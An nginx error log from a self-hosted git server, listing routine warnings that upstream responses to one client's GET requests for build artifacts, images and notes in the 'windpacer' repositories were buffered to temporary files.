2026/02/17 15:01:39 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/32/0000014322 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.pyz"
2026/02/17 15:02:37 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/32/0000014323 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/base_library.zip"
2026/02/17 15:03:06 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/32/0000014324 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.pyz"
2026/02/17 15:04:36 [warn] 918#918: *57306 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/32/0000014325 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/base_library.zip"
2026/02/17 15:05:14 [warn] 918#918: *57306 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/32/0000014326 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/base_library.zip"
2026/02/17 15:06:14 [warn] 918#918: *57306 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/32/0000014327 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.html"
2026/02/17 15:06:28 [warn] 918#918: *57306 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/32/0000014328 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom3.png"
2026/02/17 15:06:35 [warn] 918#918: *57306 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/32/0000014329 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom1.png"
2026/02/17 15:06:42 [warn] 918#918: *57306 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/33/0000014330 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom6.png"
2026/02/17 15:06:48 [warn] 918#918: *57306 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/33/0000014331 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom5.png"
2026/02/17 15:06:56 [warn] 918#918: *57306 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/33/0000014332 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom2.png"
2026/02/17 15:07:02 [warn] 918#918: *57306 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/33/0000014333 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom4.png"
2026/02/17 15:07:15 [warn] 918#918: *57306 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/33/0000014334 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom2.png"
2026/02/17 15:07:44 [warn] 918#918: *57306 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/33/0000014335 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg"
2026/02/17 15:07:49 [warn] 918#918: *57306 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/33/0000014336 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg"
2026/02/17 15:07:55 [warn] 918#918: *57306 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/33/0000014337 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg"
2026/02/17 15:14:52 [warn] 918#918: *58310 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/33/0000014338 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md"
2026/02/17 15:14:52 [warn] 918#918: *58310 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/33/0000014339 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md"
2026/02/17 15:20:00 [warn] 918#918: *58310 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/34/0000014340 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg"
2026/02/17 15:22:37 [warn] 918#918: *58310 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/34/0000014341 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/base_library.zip"
2026/02/17 15:22:42 [warn] 918#918: *58310 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/34/0000014342 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/base_library.zip"
2026/02/17 15:23:39 [warn] 921#921: *59312 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/34/0000014343 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol"
2026/02/17 15:23:49 [warn] 921#921: *59312 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/34/0000014344 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html"
2026/02/17 15:23:50 [warn] 921#921: *59312 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/34/0000014345 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html"
2026/02/17 15:24:50 [warn] 921#921: *59312 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/34/0000014346 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/base_library.zip"
2026/02/17 15:32:52 [warn] 921#921: *60316 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/34/0000014347 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/base_library.zip"
2026/02/17 15:39:15 [warn] 921#921: *60316 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/34/0000014348 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz"
2026/02/17 15:42:08 [warn] 921#921: *61318 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/34/0000014349 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/html/assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/html/assets/images/bearing.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/bearing.png"
2026/02/17 15:45:08 [warn] 921#921: *61318 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/35/0000014350 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_access.log HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_access.log", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_access.log"
2026/02/17 15:50:28 [warn] 921#921: *62321 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/35/0000014351 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz"
2026/02/17 15:50:57 [warn] 921#921: *62321 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/35/0000014352 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz"
2026/02/17 15:51:38 [warn] 921#921: *62321 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/35/0000014353 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz"
2026/02/17 15:51:43 [warn] 921#921: *62321 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/35/0000014354 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz"
2026/02/17 15:52:16 [warn] 921#921: *62321 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/35/0000014355 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz"
2026/02/17 15:52:23 [warn] 921#921: *62321 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/35/0000014356 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz"
2026/02/17 15:52:55 [warn] 921#921: *62321 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/35/0000014357 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/bearing.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html"
2026/02/17 15:53:13 [warn] 921#921: *62321 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/35/0000014358 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/bearing.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/bearing.png"
2026/02/17 15:53:21 [warn] 921#921: *62321 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/35/0000014359 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/reactor.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/reactor.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/reactor.png"
2026/02/17 16:01:19 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/36/0000014360 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz"
